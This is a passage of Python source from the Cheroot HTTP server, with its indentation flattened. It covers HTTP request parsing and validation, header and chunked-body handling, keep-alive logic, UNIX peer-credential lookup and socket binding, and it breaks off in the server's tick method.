resp = (
'Malformed method name: According to RFC 2616 '
'(section 5.1.1) and its successors '
'RFC 7230 (section 3.1.1) and RFC 7231 (section 4.1) '
'method names are case-sensitive and uppercase.'
)
self.simple_response('400 Bad Request', resp)
return False
try:
if six.PY2: # FIXME: Figure out better way to do this
# Ref: https://stackoverflow.com/a/196392/595220 (like this?)
"""This is a dummy check for unicode in URI."""
ntou(bton(uri, 'ascii'), 'ascii')
scheme, authority, path, qs, fragment = urllib.parse.urlsplit(uri)
except UnicodeError:
self.simple_response('400 Bad Request', 'Malformed Request-URI')
return False
uri_is_absolute_form = (scheme or authority)
if self.method == b'OPTIONS':
# TODO: cover this branch with tests
path = (
uri
# https://tools.ietf.org/html/rfc7230#section-5.3.4
if (self.proxy_mode and uri_is_absolute_form)
else path
)
elif self.method == b'CONNECT':
# TODO: cover this branch with tests
if not self.proxy_mode:
self.simple_response('405 Method Not Allowed')
return False
# `urlsplit()` above parses "example.com:3128" as path part of URI.
# this is a workaround, which makes it detect netloc correctly
uri_split = urllib.parse.urlsplit(b''.join((b'//', uri)))
_scheme, _authority, _path, _qs, _fragment = uri_split
_port = EMPTY
try:
_port = uri_split.port
except ValueError:
pass
# FIXME: use third-party validation to make checks against RFC
            # the validation doesn't take into account that urllib parses
            # invalid URIs without raising errors
# https://tools.ietf.org/html/rfc7230#section-5.3.3
invalid_path = (
_authority != uri
or not _port
or any((_scheme, _path, _qs, _fragment))
)
if invalid_path:
self.simple_response(
'400 Bad Request',
'Invalid path in Request-URI: request-'
'target must match authority-form.',
)
return False
authority = path = _authority
scheme = qs = fragment = EMPTY
else:
disallowed_absolute = (
self.strict_mode
and not self.proxy_mode
and uri_is_absolute_form
)
if disallowed_absolute:
# https://tools.ietf.org/html/rfc7230#section-5.3.2
# (absolute form)
"""Absolute URI is only allowed within proxies."""
self.simple_response(
'400 Bad Request',
'Absolute URI not allowed if server is not a proxy.',
)
return False
invalid_path = (
self.strict_mode
and not uri.startswith(FORWARD_SLASH)
and not uri_is_absolute_form
)
if invalid_path:
# https://tools.ietf.org/html/rfc7230#section-5.3.1
# (origin_form) and
"""Path should start with a forward slash."""
resp = (
'Invalid path in Request-URI: request-target must contain '
'origin-form which starts with absolute-path (URI '
'starting with a slash "/").'
)
self.simple_response('400 Bad Request', resp)
return False
if fragment:
self.simple_response(
'400 Bad Request',
'Illegal #fragment in Request-URI.',
)
return False
if path is None:
# FIXME: It looks like this case cannot happen
self.simple_response(
'400 Bad Request',
'Invalid path in Request-URI.',
)
return False
# Unquote the path+params (e.g. "/this%20path" -> "/this path").
# https://www.w3.org/Protocols/rfc2616/rfc2616-sec5.html#sec5.1.2
#
# But note that "...a URI must be separated into its components
# before the escaped characters within those components can be
# safely decoded." https://www.ietf.org/rfc/rfc2396.txt, sec 2.4.2
# Therefore, "/this%2Fpath" becomes "/this%2Fpath", not
# "/this/path".
try:
# TODO: Figure out whether exception can really happen here.
# It looks like it's caught on urlsplit() call above.
atoms = [
urllib.parse.unquote_to_bytes(x)
for x in QUOTED_SLASH_REGEX.split(path)
]
except ValueError as ex:
self.simple_response('400 Bad Request', ex.args[0])
return False
path = QUOTED_SLASH.join(atoms)
if not path.startswith(FORWARD_SLASH):
path = FORWARD_SLASH + path
if scheme is not EMPTY:
self.scheme = scheme
self.authority = authority
self.path = path
# Note that, like wsgiref and most other HTTP servers,
# we "% HEX HEX"-unquote the path but not the query string.
self.qs = qs
# Compare request and server HTTP protocol versions, in case our
# server does not support the requested protocol. Limit our output
# to min(req, server). We want the following output:
# request server actual written supported response
# protocol protocol response protocol feature set
# a 1.0 1.0 1.0 1.0
# b 1.0 1.1 1.1 1.0
# c 1.1 1.0 1.0 1.0
# d 1.1 1.1 1.1 1.1
# Notice that, in (b), the response will be "HTTP/1.1" even though
# the client only understands 1.0. RFC 2616 10.5.6 says we should
# only return 505 if the _major_ version is different.
sp = int(self.server.protocol[5]), int(self.server.protocol[7])
if sp[0] != rp[0]:
self.simple_response('505 HTTP Version Not Supported')
return False
self.request_protocol = req_protocol
self.response_protocol = 'HTTP/%s.%s' % min(rp, sp)
return True
def read_request_headers(self): # noqa: C901 # FIXME
"""Read ``self.rfile`` into ``self.inheaders``.
        Ref: :py:attr:`self.inheaders <HTTPRequest.inheaders>`.
:returns: success status
:rtype: bool
"""
# then all the http headers
try:
self.header_reader(self.rfile, self.inheaders)
except ValueError as ex:
self.simple_response('400 Bad Request', ex.args[0])
return False
mrbs = self.server.max_request_body_size
try:
cl = int(self.inheaders.get(b'Content-Length', 0))
except ValueError:
self.simple_response(
'400 Bad Request',
'Malformed Content-Length Header.',
)
return False
if mrbs and cl > mrbs:
self.simple_response(
'413 Request Entity Too Large',
'The entity sent with the request exceeds the maximum '
'allowed bytes.',
)
return False
# Persistent connection support
if self.response_protocol == 'HTTP/1.1':
# Both server and client are HTTP/1.1
if self.inheaders.get(b'Connection', b'') == b'close':
self.close_connection = True
else:
# Either the server or client (or both) are HTTP/1.0
if self.inheaders.get(b'Connection', b'') != b'Keep-Alive':
self.close_connection = True
# Transfer-Encoding support
te = None
if self.response_protocol == 'HTTP/1.1':
te = self.inheaders.get(b'Transfer-Encoding')
if te:
te = [x.strip().lower() for x in te.split(b',') if x.strip()]
self.chunked_read = False
if te:
for enc in te:
if enc == b'chunked':
self.chunked_read = True
else:
# Note that, even if we see "chunked", we must reject
# if there is an extension we don't recognize.
self.simple_response('501 Unimplemented')
self.close_connection = True
return False
# From PEP 333:
# "Servers and gateways that implement HTTP 1.1 must provide
# transparent support for HTTP 1.1's "expect/continue" mechanism.
# This may be done in any of several ways:
# 1. Respond to requests containing an Expect: 100-continue request
# with an immediate "100 Continue" response, and proceed normally.
# 2. Proceed with the request normally, but provide the application
# with a wsgi.input stream that will send the "100 Continue"
# response if/when the application first attempts to read from
# the input stream. The read request must then remain blocked
# until the client responds.
# 3. Wait until the client decides that the server does not support
# expect/continue, and sends the request body on its own.
# (This is suboptimal, and is not recommended.)
#
# We used to do 3, but are now doing 1. Maybe we'll do 2 someday,
# but it seems like it would be a big slowdown for such a rare case.
if self.inheaders.get(b'Expect', b'') == b'100-continue':
# Don't use simple_response here, because it emits headers
# we don't want. See
# https://github.com/cherrypy/cherrypy/issues/951
msg = b''.join((
self.server.protocol.encode('ascii'), SPACE, b'100 Continue',
CRLF, CRLF,
))
try:
self.conn.wfile.write(msg)
except socket.error as ex:
if ex.args[0] not in errors.socket_errors_to_ignore:
raise
return True
def respond(self):
"""Call the gateway and write its iterable output."""
mrbs = self.server.max_request_body_size
if self.chunked_read:
self.rfile = ChunkedRFile(self.conn.rfile, mrbs)
else:
cl = int(self.inheaders.get(b'Content-Length', 0))
if mrbs and mrbs < cl:
if not self.sent_headers:
self.simple_response(
'413 Request Entity Too Large',
'The entity sent with the request exceeds the '
'maximum allowed bytes.',
)
return
self.rfile = KnownLengthRFile(self.conn.rfile, cl)
self.server.gateway(self).respond()
self.ready and self.ensure_headers_sent()
if self.chunked_write:
self.conn.wfile.write(b'0\r\n\r\n')
def simple_response(self, status, msg=''):
"""Write a simple response back to the client."""
status = str(status)
proto_status = '%s %s\r\n' % (self.server.protocol, status)
content_length = 'Content-Length: %s\r\n' % len(msg)
content_type = 'Content-Type: text/plain\r\n'
buf = [
proto_status.encode('ISO-8859-1'),
content_length.encode('ISO-8859-1'),
content_type.encode('ISO-8859-1'),
]
if status[:3] in ('413', '414'):
# Request Entity Too Large / Request-URI Too Long
self.close_connection = True
if self.response_protocol == 'HTTP/1.1':
# This will not be true for 414, since read_request_line
# usually raises 414 before reading the whole line, and we
# therefore cannot know the proper response_protocol.
buf.append(b'Connection: close\r\n')
else:
# HTTP/1.0 had no 413/414 status nor Connection header.
# Emit 400 instead and trust the message body is enough.
status = '400 Bad Request'
buf.append(CRLF)
if msg:
if isinstance(msg, six.text_type):
msg = msg.encode('ISO-8859-1')
buf.append(msg)
try:
self.conn.wfile.write(EMPTY.join(buf))
except socket.error as ex:
if ex.args[0] not in errors.socket_errors_to_ignore:
raise
def ensure_headers_sent(self):
"""Ensure headers are sent to the client if not already sent."""
if not self.sent_headers:
self.sent_headers = True
self.send_headers()
def write(self, chunk):
"""Write unbuffered data to the client."""
if self.chunked_write and chunk:
chunk_size_hex = hex(len(chunk))[2:].encode('ascii')
buf = [chunk_size_hex, CRLF, chunk, CRLF]
self.conn.wfile.write(EMPTY.join(buf))
else:
self.conn.wfile.write(chunk)
def send_headers(self): # noqa: C901 # FIXME
"""Assert, process, and send the HTTP response message-headers.
You must set ``self.status``, and :py:attr:`self.outheaders
<HTTPRequest.outheaders>` before calling this.
"""
hkeys = [key.lower() for key, value in self.outheaders]
status = int(self.status[:3])
if status == 413:
# Request Entity Too Large. Close conn to avoid garbage.
self.close_connection = True
elif b'content-length' not in hkeys:
# "All 1xx (informational), 204 (no content),
# and 304 (not modified) responses MUST NOT
# include a message-body." So no point chunking.
if status < 200 or status in (204, 205, 304):
pass
else:
needs_chunked = (
self.response_protocol == 'HTTP/1.1'
and self.method != b'HEAD'
)
if needs_chunked:
# Use the chunked transfer-coding
self.chunked_write = True
self.outheaders.append((b'Transfer-Encoding', b'chunked'))
else:
# Closing the conn is the only way to determine len.
self.close_connection = True
# Override the decision to not close the connection if the connection
# manager doesn't have space for it.
if not self.close_connection:
can_keep = self.server.connections.can_add_keepalive_connection
self.close_connection = not can_keep
if b'connection' not in hkeys:
if self.response_protocol == 'HTTP/1.1':
# Both server and client are HTTP/1.1 or better
if self.close_connection:
self.outheaders.append((b'Connection', b'close'))
else:
# Server and/or client are HTTP/1.0
if not self.close_connection:
self.outheaders.append((b'Connection', b'Keep-Alive'))
if (b'Connection', b'Keep-Alive') in self.outheaders:
self.outheaders.append((
b'Keep-Alive',
u'timeout={connection_timeout}'.
format(connection_timeout=self.server.timeout).
encode('ISO-8859-1'),
))
if (not self.close_connection) and (not self.chunked_read):
# Read any remaining request body data on the socket.
# "If an origin server receives a request that does not include an
# Expect request-header field with the "100-continue" expectation,
# the request includes a request body, and the server responds
# with a final status code before reading the entire request body
# from the transport connection, then the server SHOULD NOT close
# the transport connection until it has read the entire request,
# or until the client closes the connection. Otherwise, the client
# might not reliably receive the response message. However, this
            # requirement is not to be construed as preventing a server from
# defending itself against denial-of-service attacks, or from
# badly broken client implementations."
remaining = getattr(self.rfile, 'remaining', 0)
if remaining > 0:
self.rfile.read(remaining)
if b'date' not in hkeys:
self.outheaders.append((
b'Date',
email.utils.formatdate(usegmt=True).encode('ISO-8859-1'),
))
if b'server' not in hkeys:
self.outheaders.append((
b'Server',
self.server.server_name.encode('ISO-8859-1'),
))
proto = self.server.protocol.encode('ascii')
buf = [proto + SPACE + self.status + CRLF]
for k, v in self.outheaders:
buf.append(k + COLON + SPACE + v + CRLF)
buf.append(CRLF)
self.conn.wfile.write(EMPTY.join(buf))
class HTTPConnection:
"""An HTTP connection (active socket)."""
remote_addr = None
remote_port = None
ssl_env = None
rbufsize = io.DEFAULT_BUFFER_SIZE
wbufsize = io.DEFAULT_BUFFER_SIZE
RequestHandlerClass = HTTPRequest
peercreds_enabled = False
peercreds_resolve_enabled = False
# Fields set by ConnectionManager.
last_used = None
def __init__(self, server, sock, makefile=MakeFile):
"""Initialize HTTPConnection instance.
Args:
server (HTTPServer): web server object receiving this request
sock (socket._socketobject): the raw socket object (usually
TCP) for this connection
makefile (file): a fileobject class for reading from the socket
"""
self.server = server
self.socket = sock
self.rfile = makefile(sock, 'rb', self.rbufsize)
self.wfile = makefile(sock, 'wb', self.wbufsize)
self.requests_seen = 0
self.peercreds_enabled = self.server.peercreds_enabled
self.peercreds_resolve_enabled = self.server.peercreds_resolve_enabled
# LRU cached methods:
# Ref: https://stackoverflow.com/a/14946506/595220
self.resolve_peer_creds = (
lru_cache(maxsize=1)(self.resolve_peer_creds)
)
self.get_peer_creds = (
lru_cache(maxsize=1)(self.get_peer_creds)
)
def communicate(self): # noqa: C901 # FIXME
"""Read each request and respond appropriately.
Returns true if the connection should be kept open.
"""
request_seen = False
try:
req = self.RequestHandlerClass(self.server, self)
req.parse_request()
if self.server.stats['Enabled']:
self.requests_seen += 1
if not req.ready:
# Something went wrong in the parsing (and the server has
# probably already made a simple_response). Return and
# let the conn close.
return False
request_seen = True
req.respond()
if not req.close_connection:
return True
except socket.error as ex:
errnum = ex.args[0]
# sadly SSL sockets return a different (longer) time out string
timeout_errs = 'timed out', 'The read operation timed out'
if errnum in timeout_errs:
# Don't error if we're between requests; only error
# if 1) no request has been started at all, or 2) we're
# in the middle of a request.
# See https://github.com/cherrypy/cherrypy/issues/853
if (not request_seen) or (req and req.started_request):
self._conditional_error(req, '408 Request Timeout')
elif errnum not in errors.socket_errors_to_ignore:
self.server.error_log(
'socket.error %s' % repr(errnum),
level=logging.WARNING, traceback=True,
)
self._conditional_error(req, '500 Internal Server Error')
except (KeyboardInterrupt, SystemExit):
raise
except errors.FatalSSLAlert:
pass
except errors.NoSSLError:
self._handle_no_ssl(req)
except Exception as ex:
self.server.error_log(
repr(ex), level=logging.ERROR, traceback=True,
)
self._conditional_error(req, '500 Internal Server Error')
return False
linger = False
def _handle_no_ssl(self, req):
if not req or req.sent_headers:
return
# Unwrap wfile
try:
resp_sock = self.socket._sock
except AttributeError:
# self.socket is of OpenSSL.SSL.Connection type
resp_sock = self.socket._socket
self.wfile = StreamWriter(resp_sock, 'wb', self.wbufsize)
msg = (
'The client sent a plain HTTP request, but '
'this server only speaks HTTPS on this port.'
)
req.simple_response('400 Bad Request', msg)
self.linger = True
def _conditional_error(self, req, response):
"""Respond with an error.
Don't bother writing if a response
has already started being written.
"""
if not req or req.sent_headers:
return
try:
req.simple_response(response)
except errors.FatalSSLAlert:
pass
except errors.NoSSLError:
self._handle_no_ssl(req)
def close(self):
"""Close the socket underlying this connection."""
self.rfile.close()
if not self.linger:
self._close_kernel_socket()
self.socket.close()
else:
# On the other hand, sometimes we want to hang around for a bit
# to make sure the client has a chance to read our entire
# response. Skipping the close() calls here delays the FIN
# packet until the socket object is garbage-collected later.
# Someday, perhaps, we'll do the full lingering_close that
# Apache does, but not today.
pass
def get_peer_creds(self): # LRU cached on per-instance basis, see __init__
"""Return the PID/UID/GID tuple of the peer socket for UNIX sockets.
This function uses SO_PEERCRED to query the UNIX PID, UID, GID
of the peer, which is only available if the bind address is
a UNIX domain socket.
Raises:
NotImplementedError: in case of unsupported socket type
RuntimeError: in case of SO_PEERCRED lookup unsupported or disabled
"""
PEERCRED_STRUCT_DEF = '3i'
if IS_WINDOWS or self.socket.family != socket.AF_UNIX:
raise NotImplementedError(
'SO_PEERCRED is only supported in Linux kernel and WSL',
)
elif not self.peercreds_enabled:
raise RuntimeError(
'Peer creds lookup is disabled within this server',
)
try:
peer_creds = self.socket.getsockopt(
# FIXME: Use LOCAL_CREDS for BSD-like OSs
# Ref: https://gist.github.com/LucaFilipozzi/e4f1e118202aff27af6aadebda1b5d91 # noqa
socket.SOL_SOCKET, socket.SO_PEERCRED,
struct.calcsize(PEERCRED_STRUCT_DEF),
)
except socket.error as socket_err:
"""Non-Linux kernels don't support SO_PEERCRED.
Refs:
http://welz.org.za/notes/on-peer-cred.html
https://github.com/daveti/tcpSockHack
msdn.microsoft.com/en-us/commandline/wsl/release_notes#build-15025
"""
six.raise_from( # 3.6+: raise RuntimeError from socket_err
RuntimeError,
socket_err,
)
else:
pid, uid, gid = struct.unpack(PEERCRED_STRUCT_DEF, peer_creds)
return pid, uid, gid
@property
def peer_pid(self):
"""Return the id of the connected peer process."""
pid, _, _ = self.get_peer_creds()
return pid
@property
def peer_uid(self):
"""Return the user id of the connected peer process."""
_, uid, _ = self.get_peer_creds()
return uid
@property
def peer_gid(self):
"""Return the group id of the connected peer process."""
_, _, gid = self.get_peer_creds()
return gid
def resolve_peer_creds(self): # LRU cached on per-instance basis
"""Look up the username and group tuple of the ``PEERCREDS``.
:returns: the username and group tuple of the ``PEERCREDS``
:raises NotImplementedError: if the OS is unsupported
:raises RuntimeError: if UID/GID lookup is unsupported or disabled
"""
if not IS_UID_GID_RESOLVABLE:
raise NotImplementedError(
'UID/GID lookup is unavailable under current platform. '
'It can only be done under UNIX-like OS '
'but not under the Google App Engine',
)
elif not self.peercreds_resolve_enabled:
raise RuntimeError(
'UID/GID lookup is disabled within this server',
)
user = pwd.getpwuid(self.peer_uid).pw_name # [0]
group = grp.getgrgid(self.peer_gid).gr_name # [0]
return user, group
@property
def peer_user(self):
"""Return the username of the connected peer process."""
user, _ = self.resolve_peer_creds()
return user
@property
def peer_group(self):
"""Return the group of the connected peer process."""
_, group = self.resolve_peer_creds()
return group
def _close_kernel_socket(self):
"""Close kernel socket in outdated Python versions.
On old Python versions,
Python's socket module does NOT call close on the kernel
socket when you call socket.close(). We do so manually here
because we want this server to send a FIN TCP segment
immediately. Note this must be called *before* calling
socket.close(), because the latter drops its reference to
the kernel socket.
"""
if six.PY2 and hasattr(self.socket, '_sock'):
self.socket._sock.close()
class HTTPServer:
"""An HTTP server."""
_bind_addr = '127.0.0.1'
_interrupt = None
gateway = None
"""A Gateway instance."""
minthreads = None
"""The minimum number of worker threads to create (default 10)."""
maxthreads = None
"""The maximum number of worker threads to create.
(default -1 = no limit)"""
server_name = None
"""The name of the server; defaults to ``self.version``."""
protocol = 'HTTP/1.1'
"""The version string to write in the Status-Line of all HTTP responses.
For example, "HTTP/1.1" is the default. This also limits the supported
features used in the response."""
request_queue_size = 5
"""The 'backlog' arg to socket.listen(); max queued connections.
(default 5)."""
shutdown_timeout = 5
"""The total time to wait for worker threads to cleanly exit.
Specified in seconds."""
timeout = 10
"""The timeout in seconds for accepted connections (default 10)."""
version = 'Cheroot/{version!s}'.format(version=__version__)
"""A version string for the HTTPServer."""
software = None
"""The value to set for the SERVER_SOFTWARE entry in the WSGI environ.
If None, this defaults to ``'%s Server' % self.version``.
"""
ready = False
"""Internal flag which indicating the socket is accepting connections."""
max_request_header_size = 0
"""The maximum size, in bytes, for request headers, or 0 for no limit."""
max_request_body_size = 0
"""The maximum size, in bytes, for request bodies, or 0 for no limit."""
nodelay = True
"""If True (the default since 3.1), sets the TCP_NODELAY socket option."""
ConnectionClass = HTTPConnection
"""The class to use for handling HTTP connections."""
ssl_adapter = None
"""An instance of ``ssl.Adapter`` (or a subclass).
Ref: :py:class:`ssl.Adapter <cheroot.ssl.Adapter>`.
You must have the corresponding TLS driver library installed.
"""
peercreds_enabled = False
"""
If :py:data:`True`, peer creds will be looked up via UNIX domain socket.
"""
peercreds_resolve_enabled = False
"""
If :py:data:`True`, username/group will be looked up in the OS from
``PEERCREDS``-provided IDs.
"""
keep_alive_conn_limit = 10
"""The maximum number of waiting keep-alive connections that will be kept open.
Default is 10. Set to None to have unlimited connections."""
def __init__(
self, bind_addr, gateway,
minthreads=10, maxthreads=-1, server_name=None,
peercreds_enabled=False, peercreds_resolve_enabled=False,
):
"""Initialize HTTPServer instance.
Args:
bind_addr (tuple): network interface to listen to
gateway (Gateway): gateway for processing HTTP requests
minthreads (int): minimum number of threads for HTTP thread pool
maxthreads (int): maximum number of threads for HTTP thread pool
server_name (str): web server name to be advertised via Server
HTTP header
"""
self.bind_addr = bind_addr
self.gateway = gateway
self.requests = threadpool.ThreadPool(
self, min=minthreads or 1, max=maxthreads,
)
self.serving = False
if not server_name:
server_name = self.version
self.server_name = server_name
self.peercreds_enabled = peercreds_enabled
self.peercreds_resolve_enabled = (
peercreds_resolve_enabled and peercreds_enabled
)
self.clear_stats()
def clear_stats(self):
"""Reset server stat counters.."""
self._start_time = None
self._run_time = 0
self.stats = {
'Enabled': False,
'Bind Address': lambda s: repr(self.bind_addr),
'Run time': lambda s: (not s['Enabled']) and -1 or self.runtime(),
'Accepts': 0,
'Accepts/sec': lambda s: s['Accepts'] / self.runtime(),
'Queue': lambda s: getattr(self.requests, 'qsize', None),
'Threads': lambda s: len(getattr(self.requests, '_threads', [])),
'Threads Idle': lambda s: getattr(self.requests, 'idle', None),
'Socket Errors': 0,
'Requests': lambda s: (not s['Enabled']) and -1 or sum(
(w['Requests'](w) for w in s['Worker Threads'].values()), 0,
),
'Bytes Read': lambda s: (not s['Enabled']) and -1 or sum(
(w['Bytes Read'](w) for w in s['Worker Threads'].values()), 0,
),
'Bytes Written': lambda s: (not s['Enabled']) and -1 or sum(
(w['Bytes Written'](w) for w in s['Worker Threads'].values()),
0,
),
'Work Time': lambda s: (not s['Enabled']) and -1 or sum(
(w['Work Time'](w) for w in s['Worker Threads'].values()), 0,
),
'Read Throughput': lambda s: (not s['Enabled']) and -1 or sum(
(
w['Bytes Read'](w) / (w['Work Time'](w) or 1e-6)
for w in s['Worker Threads'].values()
), 0,
),
'Write Throughput': lambda s: (not s['Enabled']) and -1 or sum(
(
w['Bytes Written'](w) / (w['Work Time'](w) or 1e-6)
for w in s['Worker Threads'].values()
), 0,
),
'Worker Threads': {},
}
logging.statistics['Cheroot HTTPServer %d' % id(self)] = self.stats
def runtime(self):
"""Return server uptime."""
if self._start_time is None:
return self._run_time
else:
return self._run_time + (time.time() - self._start_time)
def __str__(self):
"""Render Server instance representing bind address."""
return '%s.%s(%r)' % (
self.__module__, self.__class__.__name__,
self.bind_addr,
)
@property
def bind_addr(self):
"""Return the interface on which to listen for connections.
For TCP sockets, a (host, port) tuple. Host values may be any
:term:`IPv4` or :term:`IPv6` address, or any valid hostname.
The string 'localhost' is a synonym for '127.0.0.1' (or '::1',
if your hosts file prefers :term:`IPv6`).
The string '0.0.0.0' is a special :term:`IPv4` entry meaning
"any active interface" (INADDR_ANY), and '::' is the similar
IN6ADDR_ANY for :term:`IPv6`.
The empty string or :py:data:`None` are not allowed.
For UNIX sockets, supply the file name as a string.
        Systemd socket activation is automatic and doesn't require tampering
with this variable.
.. glossary::
:abbr:`IPv4 (Internet Protocol version 4)`
Internet Protocol version 4
:abbr:`IPv6 (Internet Protocol version 6)`
Internet Protocol version 6
"""
return self._bind_addr
@bind_addr.setter
def bind_addr(self, value):
"""Set the interface on which to listen for connections."""
if isinstance(value, tuple) and value[0] in ('', None):
# Despite the socket module docs, using '' does not
# allow AI_PASSIVE to work. Passing None instead
# returns '0.0.0.0' like we want. In other words:
# host AI_PASSIVE result
# '' Y 192.168.x.y
# '' N 192.168.x.y
# None Y 0.0.0.0
# None N 127.0.0.1
# But since you can get the same effect with an explicit
# '0.0.0.0', we deny both the empty string and None as values.
raise ValueError(
"Host values of '' or None are not allowed. "
"Use '0.0.0.0' (IPv4) or '::' (IPv6) instead "
'to listen on all active interfaces.',
)
self._bind_addr = value
def safe_start(self):
"""Run the server forever, and stop it cleanly on exit."""
try:
self.start()
except (KeyboardInterrupt, IOError):
# The time.sleep call might raise
# "IOError: [Errno 4] Interrupted function call" on KBInt.
self.error_log('Keyboard Interrupt: shutting down')
self.stop()
raise
except SystemExit:
self.error_log('SystemExit raised: shutting down')
self.stop()
raise
def prepare(self): # noqa: C901 # FIXME
"""Prepare server to serving requests.
It binds a socket's port, setups the socket to ``listen()`` and does
other preparing things.
"""
self._interrupt = None
if self.software is None:
self.software = '%s Server' % self.version
# Select the appropriate socket
self.socket = None
msg = 'No socket could be created'
if os.getenv('LISTEN_PID', None):
# systemd socket activation
self.socket = socket.fromfd(3, socket.AF_INET, socket.SOCK_STREAM)
elif isinstance(self.bind_addr, (six.text_type, six.binary_type)):
# AF_UNIX socket
try:
self.bind_unix_socket(self.bind_addr)
except socket.error as serr:
msg = '%s -- (%s: %s)' % (msg, self.bind_addr, serr)
six.raise_from(socket.error(msg), serr)
else:
# AF_INET or AF_INET6 socket
# Get the correct address family for our host (allows IPv6
# addresses)
host, port = self.bind_addr
try:
info = socket.getaddrinfo(
host, port, socket.AF_UNSPEC,
socket.SOCK_STREAM, 0, socket.AI_PASSIVE,
)
except socket.gaierror:
sock_type = socket.AF_INET
bind_addr = self.bind_addr
if ':' in host:
sock_type = socket.AF_INET6
bind_addr = bind_addr + (0, 0)
info = [(sock_type, socket.SOCK_STREAM, 0, '', bind_addr)]
for res in info:
af, socktype, proto, canonname, sa = res
try:
self.bind(af, socktype, proto)
break
except socket.error as serr:
msg = '%s -- (%s: %s)' % (msg, sa, serr)
if self.socket:
self.socket.close()
self.socket = None
if not self.socket:
raise socket.error(msg)
# Timeout so KeyboardInterrupt can be caught on Win32
self.socket.settimeout(1)
self.socket.listen(self.request_queue_size)
self.connections = connections.ConnectionManager(self)
# Create worker threads
self.requests.start()
self.ready = True
self._start_time = time.time()
def serve(self):
"""Serve requests, after invoking :func:`prepare()`."""
self.serving = True
while self.ready:
try:
self.tick()
except (KeyboardInterrupt, SystemExit):
raise
except Exception:
self.error_log(
'Error in HTTPServer.tick', level=logging.ERROR,
traceback=True,
)
self.serving = False
def start(self):
"""Run the server forever.
        It is a shortcut for invoking :func:`prepare()` then :func:`serve()`.
"""
# We don't have to trap KeyboardInterrupt or SystemExit here,
# because cherrypy.server already does so, calling self.stop() for us.
# If you're using this server with another framework, you should
# trap those exceptions in whatever code block calls start().
self.prepare()
self.serve()
@contextlib.contextmanager
def _run_in_thread(self):
"""Context manager for running this server in a thread."""
self.prepare()
thread = threading.Thread(target=self.serve)
thread.setDaemon(True)
thread.start()
try:
yield thread
finally:
self.stop()
def error_log(self, msg='', level=20, traceback=False):
"""Write error message to log.
Args:
msg (str): error message
level (int): logging level
traceback (bool): add traceback to output or not
"""
# Override this in subclasses as desired
sys.stderr.write('{msg!s}\n'.format(msg=msg))
sys.stderr.flush()
if traceback:
tblines = traceback_.format_exc()
sys.stderr.write(tblines)
sys.stderr.flush()
def bind(self, family, type, proto=0):
"""Create (or recreate) the actual socket object."""
sock = self.prepare_socket(
self.bind_addr,
family, type, proto,
self.nodelay, self.ssl_adapter,
)
sock = self.socket = self.bind_socket(sock, self.bind_addr)
self.bind_addr = self.resolve_real_bind_addr(sock)
return sock
def bind_unix_socket(self, bind_addr): # noqa: C901 # FIXME
"""Create (or recreate) a UNIX socket object."""
if IS_WINDOWS:
"""
Trying to access socket.AF_UNIX under Windows
causes an AttributeError.
"""
raise ValueError( # or RuntimeError?
'AF_UNIX sockets are not supported under Windows.',
)
fs_permissions = 0o777 # TODO: allow changing mode
try:
# Make possible reusing the socket...
os.unlink(self.bind_addr)
except OSError:
"""
File does not exist, which is the primary goal anyway.
"""
except TypeError as typ_err:
err_msg = str(typ_err)
if (
'remove() argument 1 must be encoded '
'string without null bytes, not unicode'
not in err_msg
and 'embedded NUL character' not in err_msg # py34
and 'argument must be a '
'string without NUL characters' not in err_msg # pypy2
):
raise
except ValueError as val_err:
err_msg = str(val_err)
if (
'unlink: embedded null '
'character in path' not in err_msg
and 'embedded null byte' not in err_msg
and 'argument must be a '
'string without NUL characters' not in err_msg # pypy3
):
raise
sock = self.prepare_socket(
bind_addr=bind_addr,
family=socket.AF_UNIX, type=socket.SOCK_STREAM, proto=0,
nodelay=self.nodelay, ssl_adapter=self.ssl_adapter,
)
try:
"""Linux way of pre-populating fs mode permissions."""
# Allow everyone access the socket...
os.fchmod(sock.fileno(), fs_permissions)
FS_PERMS_SET = True
except OSError:
FS_PERMS_SET = False
try:
sock = self.bind_socket(sock, bind_addr)
except socket.error:
sock.close()
raise
bind_addr = self.resolve_real_bind_addr(sock)
try:
"""FreeBSD/macOS pre-populating fs mode permissions."""
if not FS_PERMS_SET:
try:
os.lchmod(bind_addr, fs_permissions)
except AttributeError:
os.chmod(bind_addr, fs_permissions, follow_symlinks=False)
FS_PERMS_SET = True
except OSError:
pass
if not FS_PERMS_SET:
self.error_log(
'Failed to set socket fs mode permissions',
level=logging.WARNING,
)
self.bind_addr = bind_addr
self.socket = sock
return sock
@staticmethod
def prepare_socket(bind_addr, family, type, proto, nodelay, ssl_adapter):
"""Create and prepare the socket object."""
sock = socket.socket(family, type, proto)
connections.prevent_socket_inheritance(sock)
host, port = bind_addr[:2]
IS_EPHEMERAL_PORT = port == 0
if not (IS_WINDOWS or IS_EPHEMERAL_PORT):
"""Enable SO_REUSEADDR for the current socket.
Skip for Windows (has different semantics)
or ephemeral ports (can steal ports from others).
Refs:
* https://msdn.microsoft.com/en-us/library/ms740621(v=vs.85).aspx
* https://github.com/cherrypy/cheroot/issues/114
* https://gavv.github.io/blog/ephemeral-port-reuse/
"""
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
if nodelay and not isinstance(
bind_addr,
(six.text_type, six.binary_type),
):
sock.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1)
if ssl_adapter is not None:
sock = ssl_adapter.bind(sock)
# If listening on the IPV6 any address ('::' = IN6ADDR_ANY),
# activate dual-stack. See
# https://github.com/cherrypy/cherrypy/issues/871.
listening_ipv6 = (
hasattr(socket, 'AF_INET6')
and family == socket.AF_INET6
and host in ('::', '::0', '::0.0.0.0')
)
if listening_ipv6:
try:
sock.setsockopt(
socket.IPPROTO_IPV6, socket.IPV6_V6ONLY, 0,
)
except (AttributeError, socket.error):
# Apparently, the socket option is not available in
# this machine's TCP stack
pass
return sock
@staticmethod
def bind_socket(socket_, bind_addr):
"""Bind the socket to given interface."""
socket_.bind(bind_addr)
return socket_
@staticmethod
def resolve_real_bind_addr(socket_):
"""Retrieve actual bind address from bound socket."""
        # FIXME: keep the requested bind_addr separate from the real bound_addr
        # (the port differs when an ephemeral port 0 was requested)
bind_addr = socket_.getsockname()
if socket_.family in (
# Windows doesn't have socket.AF_UNIX, so not using it in check
socket.AF_INET,
socket.AF_INET6,
):
"""UNIX domain sockets are strings or bytes.
In case of bytes with a leading null-byte it's an abstract socket.
"""
return bind_addr[:2]
if isinstance(bind_addr, six.binary_type):
bind_addr = bton(bind_addr)
return bind_addr
def tick(self):
"""Accept a new connection and put it on the Queue."""
conn = self.connections.get_conn()
